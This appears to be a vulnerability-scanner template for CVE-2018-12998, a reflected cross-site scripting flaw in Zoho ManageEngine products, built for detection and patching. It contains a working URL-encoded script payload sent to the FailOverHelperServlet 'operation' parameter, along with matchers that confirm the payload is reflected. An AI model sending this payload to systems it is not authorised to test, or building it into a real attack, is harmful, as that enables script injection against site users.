id: CVE-2018-12998

info:
  name: Zoho manageengine - Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: Zoho manageengine is vulnerable to reflected cross-site scripting. This impacts  Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet.
  remediation: |
    Apply the latest security patch or update provided by Zoho ManageEngine to fix the XSS vulnerability.
  reference:
    - https://github.com/unh3x/just4cve/issues/10
    - http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html
    - https://nvd.nist.gov/vuln/detail/CVE-2018-12998
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2018-12998
    cwe-id: CWE-79
    epss-score: 0.97052
    epss-percentile: 0.99648
    cpe: cpe:2.3:a:zohocorp:firewall_analyzer:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: zohocorp
    product: firewall_analyzer
  tags: cve,cve2018,zoho,xss,manageengine,packetstorm

http:
  - method: GET
    path:
      - "{{BaseURL}}/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200